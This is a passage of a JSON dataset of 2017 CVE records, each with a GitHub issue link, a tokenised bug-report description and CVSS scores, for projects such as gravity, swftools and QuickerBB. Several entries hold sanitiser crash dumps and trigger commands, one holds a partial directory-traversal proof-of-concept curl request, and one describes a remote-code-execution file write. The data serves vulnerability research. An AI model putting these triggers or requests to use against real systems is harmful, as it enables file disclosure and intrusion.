  4572. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4573. "severity": "CRITICAL",
  4574. "baseScore": 9.8,
  4575. "impactScore": 5.9,
  4576. "exploitabilityScore": 3.9
  4577. },
  4578. {
  4579. "CVE_ID": "CVE-2017-1000073",
  4580. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/129",
  4581. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/129",
  4582. "Repo_new": "marcobambini/gravity",
  4583. "Issue_Created_At": "2017-04-10T14:07:16Z",
  4584. "description": "Heap Overflow / Corruption. ERRORTAG Valgrind: ERRORTAG Can provide test case if need be.",
  4585. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4586. "severity": "CRITICAL",
  4587. "baseScore": 9.8,
  4588. "impactScore": 5.9,
  4589. "exploitabilityScore": 3.9
  4590. },
  4591. {
  4592. "CVE_ID": "CVE-2017-1000074",
  4593. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/131",
  4594. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/131",
  4595. "Repo_new": "marcobambini/gravity",
  4596. "Issue_Created_At": "2017-04-10T22:43:02Z",
  4597. "description": "Stack Overflow APITAG \\ strcpy). There is a stack based buffer overflow in the APITAG function in gravity_core.c. Using the testcase below an attacker can overflow the integers of APITAG as well, use the var to gain complete control of the program's memory. Attached is the Valgrind, ASAN, and GDB output. Would recommend not using strcpy or memcpy unless you can ensure that bounds are being checked on both the dest and src strings. APITAG Valgrind NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./gravity PATHTAG NUMBERTAG Warning: client switching stacks? SP change NUMBERTAG ffeffe NUMBERTAG f0f NUMBERTAG to suppress, use: max stackframe NUMBERTAG or greater NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG D: string_repeat (in PATHTAG NUMBERTAG Address NUMBERTAG f0f NUMBERTAG is on thread NUMBERTAG s stack NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG at NUMBERTAG D: string_repeat (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG Address NUMBERTAG f0f NUMBERTAG is on thread NUMBERTAG s stack NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault (core dumped) ASAN: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffd0a2a NUMBERTAG pc NUMBERTAG d bp NUMBERTAG ffd NUMBERTAG e NUMBERTAG sp NUMBERTAG ffd0a2a NUMBERTAG T NUMBERTAG c in string_repeat ( PATHTAG NUMBERTAG bbcb in gravity_vm_exec ( PATHTAG NUMBERTAG fc NUMBERTAG in gravity_vm_runmain ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG a2a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) SUMMARY: APITAG stack overflow NUMBERTAG string_repeat GDB: [ registers ] RA NUMBERTAG ef NUMBERTAG RB NUMBERTAG RC NUMBERTAG e8d4a NUMBERTAG RD NUMBERTAG RSI NUMBERTAG d6e0 ('A' <repeats NUMBERTAG times>...) RDI NUMBERTAG fff NUMBERTAG d0 RBP NUMBERTAG fffffffda NUMBERTAG d NUMBERTAG c NUMBERTAG a1d NUMBERTAG a1d0) RSP NUMBERTAG fff NUMBERTAG d0 RIP NUMBERTAG d ( APITAG : call NUMBERTAG APITAG ) R NUMBERTAG R NUMBERTAG d NUMBERTAG a NUMBERTAG a1d NUMBERTAG a1d0) R NUMBERTAG b NUMBERTAG a1d NUMBERTAG a1d0) R NUMBERTAG APITAG R NUMBERTAG b NUMBERTAG R NUMBERTAG R NUMBERTAG fff NUMBERTAG d0 R NUMBERTAG d NUMBERTAG c NUMBERTAG a1d NUMBERTAG a1d0) EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG APITAG : sub rsp,ra NUMBERTAG APITAG : mov rdi,rsp NUMBERTAG a APITAG : mov r NUMBERTAG rsp NUMBERTAG d APITAG : call NUMBERTAG APITAG NUMBERTAG APITAG : mov rcx,QWORD PTR [rbp NUMBERTAG APITAG : lea rax,[rc NUMBERTAG d APITAG : cmp rc NUMBERTAG APITAG : mov QWORD PTR [rbp NUMBERTAG rax Guessed arguments: arg NUMBERTAG fff NUMBERTAG d0 arg NUMBERTAG d6e0 ('A' <repeats NUMBERTAG times>...) [ stack ] Invalid $SP address NUMBERTAG fff NUMBERTAG d0 [ ] Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG d in string_repeat () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA APITAG RA NUMBERTAG ef NUMBERTAG RB NUMBERTAG RC NUMBERTAG e8d4a NUMBERTAG RD NUMBERTAG RDI NUMBERTAG fff NUMBERTAG d0 RSI NUMBERTAG d6e NUMBERTAG AAAAAAAA') R NUMBERTAG R NUMBERTAG d NUMBERTAG a NUMBERTAG a1d NUMBERTAG a1d0 R NUMBERTAG b NUMBERTAG a1d NUMBERTAG a1d0 R NUMBERTAG R NUMBERTAG b NUMBERTAG R NUMBERTAG R NUMBERTAG fff NUMBERTAG d0 R NUMBERTAG d NUMBERTAG c NUMBERTAG a1d NUMBERTAG a1d0 RBP NUMBERTAG fffffffda NUMBERTAG d NUMBERTAG c NUMBERTAG a1d0 \u25c2\u2014 ... RSP NUMBERTAG fff NUMBERTAG d0 RIP NUMBERTAG d (string_repeat NUMBERTAG call NUMBERTAG APITAG NUMBERTAG d APITAG call strcpy MENTIONTAG APITAG dest NUMBERTAG fff NUMBERTAG d0 src NUMBERTAG d6e NUMBERTAG AAAAAAAA NUMBERTAG APITAG mov rcx, qword ptr [rbp NUMBERTAG APITAG lea rax, [rc NUMBERTAG d APITAG cmp rc NUMBERTAG APITAG mov qword ptr [rbp NUMBERTAG ra NUMBERTAG APITAG je string_repeat NUMBERTAG APITAG NUMBERTAG a APITAG nop word ptr [rax + ra NUMBERTAG APITAG mov rsi, qword ptr [r NUMBERTAG APITAG mov rdi, r NUMBERTAG APITAG add rb NUMBERTAG b APITAG call strcat MENTIONTAG APITAG APITAG APITAG not read memory at NUMBERTAG fff NUMBERTAG d0> APITAG \u25ba f NUMBERTAG d string_repeat NUMBERTAG f NUMBERTAG bbcc gravity_vm_exec NUMBERTAG f NUMBERTAG fc NUMBERTAG gravity_vm_runmain NUMBERTAG f NUMBERTAG main NUMBERTAG f NUMBERTAG ffff NUMBERTAG d NUMBERTAG libc_start_main NUMBERTAG Program received signal SIGSEGV (fault address NUMBERTAG fff NUMBERTAG c8)",
  4598. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4599. "severity": "CRITICAL",
  4600. "baseScore": 9.8,
  4601. "impactScore": 5.9,
  4602. "exploitabilityScore": 3.9
  4603. },
  4604. {
  4605. "CVE_ID": "CVE-2017-1000075",
  4606. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/133",
  4607. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/133",
  4608. "Repo_new": "marcobambini/gravity",
  4609. "Issue_Created_At": "2017-04-11T12:43:15Z",
  4610. "description": "Stack overflow (memcmp). GDB: CODETAG POC: ERRORTAG",
  4611. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4612. "severity": "CRITICAL",
  4613. "baseScore": 9.8,
  4614. "impactScore": 5.9,
  4615. "exploitabilityScore": 3.9
  4616. },
  4617. {
  4618. "CVE_ID": "CVE-2017-1000082",
  4619. "Issue_Url_old": "https://github.com/systemd/systemd/issues/6237",
  4620. "Issue_Url_new": "https://github.com/systemd/systemd/issues/6237",
  4621. "Repo_new": "systemd/systemd",
  4622. "Issue_Created_At": "2017-06-29T06:30:08Z",
  4623. "description": "systemd can't handle the process previlege that belongs to user name startswith number, such as NUMBERTAG day. Submission type Bug report systemd version the issue has been seen with > systemd NUMBERTAG Used distribution > Linux ubuntu NUMBERTAG generic NUMBERTAG Ubuntu SMP Thu Apr NUMBERTAG UTC NUMBERTAG APITAG In case of bug report: Expected behaviour you didn't see > The process started by systemd should be user previlege In case of bug report: Unexpected behaviour you saw > The process started by systemd was root previlege In case of bug report: Steps to reproduce the problem linux user's name : APITAG conf file: APITAG CODETAG and then use APITAG to start process, but the previlege is root When I use xinted to start the service, it can start with linux user APITAG previlege",
  4624. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4625. "severity": "CRITICAL",
  4626. "baseScore": 9.8,
  4627. "impactScore": 5.9,
  4628. "exploitabilityScore": 3.9
  4629. },
  4630. {
  4631. "CVE_ID": "CVE-2017-1000097",
  4632. "Issue_Url_old": "https://github.com/golang/go/issues/18141",
  4633. "Issue_Url_new": "https://github.com/golang/go/issues/18141",
  4634. "Repo_new": "golang/go",
  4635. "Issue_Created_At": "2016-12-01T16:38:39Z",
  4636. "description": "embargoed security issue. Placeholder for NUMBERTAG and NUMBERTAG security releases",
  4637. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  4638. "severity": "HIGH",
  4639. "baseScore": 7.5,
  4640. "impactScore": 3.6,
  4641. "exploitabilityScore": 3.9
  4642. },
  4643. {
  4644. "CVE_ID": "CVE-2017-1000168",
  4645. "Issue_Url_old": "https://github.com/dnaq/sodiumoxide/issues/154",
  4646. "Issue_Url_new": "https://github.com/dnaq/sodiumoxide/issues/154",
  4647. "Repo_new": "dnaq/sodiumoxide",
  4648. "Issue_Created_At": "2017-01-26T12:39:20Z",
  4649. "description": "APITAG supports degenerate public keys (insecure). Currently APITAG accepts all zero public keys, for which the result (DH shared secret) will always be zero regardless of the private key used. Against this, libsodium's APITAG returns a non zero value if it encounters such degenerate keys. You should therefore check its return value when calling APITAG .",
  4650. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  4651. "severity": "MEDIUM",
  4652. "baseScore": 6.5,
  4653. "impactScore": 3.6,
  4654. "exploitabilityScore": 2.8
  4655. },
  4656. {
  4657. "CVE_ID": "CVE-2017-1000169",
  4658. "Issue_Url_old": "https://github.com/halojoy/QuickerBB/issues/10",
  4659. "Issue_Url_new": "https://github.com/halojoy/quickerbb/issues/10",
  4660. "Repo_new": "halojoy/QuickerBB",
  4661. "Issue_Created_At": "2017-04-28T12:28:12Z",
  4662. "description": "Arbitrary File Write Leading to RCE. Hi, I found that there is an arbitrary file write leading to remote code execution in APITAG (in specific FILETAG ). The exact request that creates an RCE shell in FILETAG is given below: CODETAG install_step3.php writes to FILETAG without actually checking or sanitising what it writes. Also FILETAG is not blocked off by the .htaccess file allowing anyone who has not removed the installation files to be vulnerable to this attack. Remediation I would suggest sanitising the input with something like htmlentities. There are many other ways of doing this, but this would be a quick and easy fix. Another extra layer would be adding the FILETAG file into the htaccess file as not allowed to be viewed. This ensures that even if the file writing is bypassed, the file cannot be executed by an unauthorised user.",
  4663. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4664. "severity": "CRITICAL",
  4665. "baseScore": 9.8,
  4666. "impactScore": 5.9,
  4667. "exploitabilityScore": 3.9
  4668. },
  4669. {
  4670. "CVE_ID": "CVE-2017-1000170",
  4671. "Issue_Url_old": "https://github.com/jqueryfiletree/jqueryfiletree/issues/66",
  4672. "Issue_Url_new": "https://github.com/jqueryfiletree/jqueryfiletree/issues/66",
  4673. "Repo_new": "jqueryfiletree/jqueryfiletree",
  4674. "Issue_Created_At": "2017-05-09T01:06:27Z",
  4675. "description": "Security in connectors. The connectors may cause directory traversal attack in the default settings. POC: curl ' FILETAG H APITAG xxx' d \"dir=/\"",
  4676. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  4677. "severity": "HIGH",
  4678. "baseScore": 7.5,
  4679. "impactScore": 3.6,
  4680. "exploitabilityScore": 3.9
  4681. },
  4682. {
  4683. "CVE_ID": "CVE-2017-1000171",
  4684. "Issue_Url_old": "https://github.com/MaharaProject/mahara-mobile/issues/33",
  4685. "Issue_Url_new": "https://github.com/maharaproject/mahara-mobile-cordova/issues/33",
  4686. "Repo_new": "maharaproject/mahara-mobile-cordova",
  4687. "Issue_Created_At": "2017-05-22T22:25:49Z",
  4688. "description": "Logging of passwords in Mahara from Mahara Mobile. Security fix had been released for mahara Mobile in February NUMBERTAG in commit URLTAG Pawel Kubzdyl uncovered an issue in Mahara Mobile that logged passwords in plain text to the Mahara access log.",
  4689. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4690. "severity": "CRITICAL",
  4691. "baseScore": 9.8,
  4692. "impactScore": 5.9,
  4693. "exploitabilityScore": 3.9
  4694. },
  4695. {
  4696. "CVE_ID": "CVE-2017-1000172",
  4697. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/144",
  4698. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/144",
  4699. "Repo_new": "marcobambini/gravity",
  4700. "Issue_Created_At": "2017-04-26T02:39:22Z",
  4701. "description": "Heap Double Free / Use After Free. APITAG APITAG CODETAG ERRORTAG ERRORTAG CODETAG",
  4702. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4703. "severity": "CRITICAL",
  4704. "baseScore": 9.8,
  4705. "impactScore": 5.9,
  4706. "exploitabilityScore": 3.9
  4707. },
  4708. {
  4709. "CVE_ID": "CVE-2017-1000173",
  4710. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/172",
  4711. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/172",
  4712. "Repo_new": "marcobambini/gravity",
  4713. "Issue_Created_At": "2017-07-07T16:43:31Z",
  4714. "description": "Gravity Heap Buffer Overflow (list_join). Gravity is vulnerable to a Heap Buffer Overflow that could result in a potentially exploitable condition. Compiled on: Ubuntu NUMBERTAG POC: CODETAG By creating a large loop whiling pushing data to a buffer, we can break out of the bounds checking of that buffer. When APITAG is called on the data it will read past a buffer resulting in a Heap Buffer Overflow. GDB Output: FILETAG Arbitrary write to Heap: FILETAG",
  4715. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4716. "severity": "CRITICAL",
  4717. "baseScore": 9.8,
  4718. "impactScore": 5.9,
  4719. "exploitabilityScore": 3.9
  4720. },
  4721. {
  4722. "CVE_ID": "CVE-2017-1000174",
  4723. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/21",
  4724. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/21",
  4725. "Repo_new": "matthiaskramm/swftools",
  4726. "Issue_Created_At": "2017-06-11T13:55:26Z",
  4727. "description": "APITAG Address Access Except. crash : URLTAG url trigger : ./swfdump APITAG Crash Detail : ERRORTAG",
  4728. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4729. "severity": "MEDIUM",
  4730. "baseScore": 5.5,
  4731. "impactScore": 3.6,
  4732. "exploitabilityScore": 1.8
  4733. },
  4734. {
  4735. "CVE_ID": "CVE-2017-1000176",
  4736. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/23",
  4737. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/23",
  4738. "Repo_new": "matthiaskramm/swftools",
  4739. "Issue_Created_At": "2017-06-11T14:01:50Z",
  4740. "description": "swfc APITAG crash. Crash : URLTAG url Trigger : ./swfc swftools/swfc_crash_mem_put_ Crash Detail : ERRORTAG",
  4741. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4742. "severity": "MEDIUM",
  4743. "baseScore": 5.5,
  4744. "impactScore": 3.6,
  4745. "exploitabilityScore": 1.8
  4746. },
  4747. {
  4748. "CVE_ID": "CVE-2017-1000182",
  4749. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/30",
  4750. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/30",
  4751. "Repo_new": "matthiaskramm/swftools",
  4752. "Issue_Created_At": "2017-06-11T14:17:17Z",
  4753. "description": "wa NUMBERTAG swf memory leak. Crash : URLTAG url Trigger : ./wa NUMBERTAG swf APITAG Crash Detail : ERRORTAG",
  4754. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4755. "severity": "MEDIUM",
  4756. "baseScore": 5.5,
  4757. "impactScore": 3.6,
  4758. "exploitabilityScore": 1.8
  4759. },
  4760. {
  4761. "CVE_ID": "CVE-2017-1000185",
  4762. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/33",
  4763. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/33",
  4764. "Repo_new": "matthiaskramm/swftools",
  4765. "Issue_Created_At": "2017-06-11T14:30:32Z",
  4766. "description": "gif2swf APITAG memcpy overflow. Crash : URLTAG url Trigger : ./gif2swf r NUMBERTAG o /dev/null z swftools/git2swf_ r NUMBERTAG o_dev_null_ z_memory_corruption__fopen Crash Detail : PATHTAG ./gif2swf r NUMBERTAG o /dev/null z swftools/git2swf_ r NUMBERTAG o_dev_null_ z_memory_corruption__fopen APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c NUMBERTAG f NUMBERTAG at pc NUMBERTAG ff NUMBERTAG bb NUMBERTAG bp NUMBERTAG fff NUMBERTAG b NUMBERTAG sp NUMBERTAG fff NUMBERTAG b NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c NUMBERTAG f NUMBERTAG thread T NUMBERTAG ff NUMBERTAG bb NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG b4 in APITAG ( PATHTAG NUMBERTAG a NUMBERTAG in main ( PATHTAG NUMBERTAG ff NUMBERTAG b0e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ff8 in _start ( PATHTAG NUMBERTAG c NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ff NUMBERTAG bba NUMBERTAG in malloc ( PATHTAG NUMBERTAG d5 in APITAG ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8da NUMBERTAG c NUMBERTAG fff8db NUMBERTAG c NUMBERTAG fff8dc NUMBERTAG c NUMBERTAG fff8dd NUMBERTAG c NUMBERTAG fff8de NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  4767. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4768. "severity": "MEDIUM",
  4769. "baseScore": 5.5,
  4770. "impactScore": 3.6,
  4771. "exploitabilityScore": 1.8
  4772. },
  4773. {
  4774. "CVE_ID": "CVE-2017-1000186",
  4775. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/34",
  4776. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/34",
  4777. "Repo_new": "matthiaskramm/swftools",
  4778. "Issue_Created_At": "2017-06-12T02:31:00Z",
  4779. "description": "pdf2swf stack overflow. Crash : URLTAG url Trigger : ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG Crash Detail : PATHTAG ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffc6f NUMBERTAG ff0 (pc NUMBERTAG d NUMBERTAG e bp NUMBERTAG sp NUMBERTAG ffc6f NUMBERTAG ff0 T NUMBERTAG d NUMBERTAG d ( PATHTAG NUMBERTAG e ( PATHTAG NUMBERTAG bd NUMBERTAG PATHTAG NUMBERTAG ce NUMBERTAG PATHTAG NUMBERTAG ce NUMBERTAG PATHTAG NUMBERTAG cfaf ( PATHTAG NUMBERTAG cfc6 ( PATHTAG NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ca NUMBERTAG PATHTAG NUMBERTAG a4c0 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( 